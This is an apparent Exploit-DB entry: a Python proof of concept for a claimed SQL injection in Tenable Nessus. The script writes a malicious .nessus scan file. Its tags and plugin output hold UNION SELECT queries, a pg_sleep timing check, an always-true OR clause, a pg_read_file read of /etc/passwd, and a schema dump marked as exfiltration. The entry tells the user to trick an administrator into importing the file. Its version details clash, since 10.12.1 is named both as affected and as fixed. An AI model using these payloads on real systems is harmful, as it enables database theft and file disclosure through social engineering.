Tenable Nessus 10.12.1 - SQL Injection

EDB-ID:

52620


Author:

banyamer

Type:

webapps


Platform:

Multiple

Date:

2026-07-07


# Exploit Title:    Tenable Nessus 10.12.1 - SQL Injection 
# CVE:                  CVE-2026-57588
# Date:                 2026-06-26
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://www.tenable.com
# Software Link:        https://www.tenable.com/downloads/nessus
# Affected:             Nessus 10.12.0 and prior
# Tested on:            Nessus 10.12.0
# Category:             Remote
# Platform:             Linux / Windows
# Exploit Type:         SQL Injection
# CVSS:                 4.3 (Medium)
# Description:          A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). 
#                       Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in:             Nessus 10.12.1 and later
# Usage:
#   python3 exploit.py -o malicious.nessus
#
# Examples:
#   python3 exploit.py
#   python3 exploit.py --output poc.nessus
#
# Options:
#   -o, --output     Output filename for the malicious .nessus file
#
# Notes:
#   • This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
#   • Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
#   Generate the malicious file using this script.
#
# Step 2:
#   Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

import argparse
import xml.etree.ElementTree as ET

def create_malicious_nessus(output_file):
    root = ET.Element("NessusClientData_v2")
    report = ET.SubElement(root, "Report")
    report.set("name", "PoC - CVE-2026-57588")
    host = ET.SubElement(report, "ReportHost")
    host.set("name", "poc-target.example.com")
    host_properties = ET.SubElement(host, "HostProperties")
    tags = [
        ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
        ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
        ("ip", "192.168.1.1' OR '1'='1"),
        ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
    ]
    for name, value in tags:
        tag = ET.SubElement(host_properties, "tag")
        tag.set("name", name)
        tag.text = value
    item = ET.SubElement(host, "ReportItem")
    ET.SubElement(item, "pluginID").text = "999999"
    ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
    ET.SubElement(item, "port").text = "0"
    ET.SubElement(item, "protocol").text = "tcp"
    ET.SubElement(item, "severity").text = "0"
    ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
    plugin_output = ET.SubElement(item, "plugin_output")
    plugin_output.text = """Normal output
' UNION ALL SELECT 
    '=== DATA EXFIL START ===',
    table_name,
    column_name,
    '=== DATA EXFIL END ==='
FROM information_schema.columns 
WHERE table_schema = current_schema() -- """
    tree = ET.ElementTree(root)
    with open(output_file, "wb") as f:
        tree.write(f, encoding="utf-8", xml_declaration=True)
    print(f"[+] Malicious file successfully created: {output_file}")
    print("[+] Deliver this file to a privileged Nessus user for import.")

def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
    parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
    args = parser.parse_args()
    create_malicious_nessus(args.output)

if __name__ == "__main__":
    main()